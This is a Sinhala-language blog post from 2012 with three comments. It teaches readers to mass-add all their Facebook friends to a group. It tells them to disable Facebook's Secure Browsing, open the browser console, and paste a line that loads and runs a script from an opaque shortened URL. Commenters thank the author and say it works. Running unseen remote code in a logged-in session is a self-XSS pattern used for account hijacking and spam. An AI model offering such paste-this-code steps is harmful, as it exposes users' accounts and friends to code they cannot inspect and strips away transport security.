-moz-user-select:none; -webkit-user-select:none; -khtml-user-select:none; -ms-user-select:none; user-select:none;

තවත් එක් හීනයක්

Sunday, September 16, 2012

facebook group එකට ගෙඩිය පිටින් කස්ටිය බස්සමු

                     


                        ඉතින් යාළුවනේ මම ඔන්න අද දවසට දෙන දෙවැනි ලිපිය. මට මගේ හොදම යාළුවෙක් (යාළුවෙක් කිවුවට මාළුවෙක් වගේ) කිවුව එයාගේ group එකට කස්ටිය ටිකක් දාල දෙන්න කියල. එයාගේ group එක කිවුවට ඒක අපේ වගේ. ඉතින් යාළුවගේ නමත් කියන්නම්කෝ. නමින් අමිල මට ඇහිල තියනව සමහරැ -තෙලා- කියනව. ආදරේට වෙන්න ඇති. හරි ඉතින් කොහොම හරි දැන් මට කිවුවනේ කස්ටියව එකතු කරන්න කියල. කියපු හින්ද කරන්නත් ඕනනේ.එක එක බුවාල තෝර තෝර add කරන්න ගියාම එපා වෙනව නේ. ඉතින් මන් පොඩි ජිල්මාට් වැඩක් කරල මගේ facebook profile එකේ හිටපු කස්ටිය ඔක්කොම ගෙඩිය පිටින්ම group එකට බැස්සුවා. වැ‍ඩේ නම් එල කිරි වගේ. අනේ මට ඉතින් අපේ group එක මොකද්ද කියල කියන්න බැරි උනානේ.ITnow (Any IT point, Share With ITnow) ඔන්න ඔය නම තමයි අපේ group එක.

හරි දැන් අපි වැඩේ කරන්නේ කොහොමද කියල බලමුකෝ.

                            මුලින්ම ෆේස්බුක් ගිණුමෙ Secure Browsing OFF කරන්න ඕන. ඒක කරන විදිය දන්නේ නෑ වගේනම් ඔය දීල තියන විදියට කරන්නකෝ Facebook Account Settings >> Security Settings >> Secure Browsing එක disable කරලා Save කරන්න.වැඩේ හරිද? ඔන්න මේකෙනුත් බලා ගන්නකෝ.



                    දැන් ඉතින් ඔන්න ඒ වැඩෙත් හරි. මං අහල තියනවා එක එක කෙහෙල් ගෙඩි වලට එක එක .............. එවා කියලා. ඇය හිනාවෙන්නේ. අන්න ඒ වගේ ඔයාල පාවිච්චි කරන Brows වලට වෙන වෙනම මේ වැඩේ කරන්න ඕන. හරිනේ එහෙනම්.


  • මුලින්ම google chrome සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  Page එක කොහෙ හරි Right Click කරල "Inspect Element" අරගන්න. එහි අවසානයට ඇති  "Console"   තෝරන්න. මේ වැඩේ තේරැනේ නැති අය කෙලින්ම "F12" ඔබන්න. ආ දැන් හරිනේ.
*  ඊට පස්සේ  "Console"  එක මගින් open වු බාර් එකේ right click කරල clear Console දෙන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

  • Mozilla Firefox සදහා.
*  මුලින්ම ඔයාලට ඕන group එක තෝර ගන්න. 
*  CTRL + SHIFT + K යතුරු එකවර තදකරන්න.
*  අන්තිමේට මෙන්න මේ ටික copy කරල past කරල enter කරන්න .

document.body.appendChild(document.createElement('script')).src='http://goo.gl/aQwsk';

            දැන් වැඩ ටික ඔක්කොම හරි.   බලන් ඉද්දි කස්ටිය group එකට පෝලිමේ එනව. ඉතින් මේ ගැන මොනව හරි කියලම යන්න.

           ආ.... ඔයාල මේක කරලම බලන්න. මට කරන පොඩි උදව්වක් විදියට මේ group එකට කස්ටිය ටිකක් දාල දෙන්න. මෙන්න group එක.



3 comments:

Unknown said...

Wooooow. Tanx anjula

iHelp.lk said...

thanks a.... 1st comment ekata

fahmykf said...

thanks machoo it's working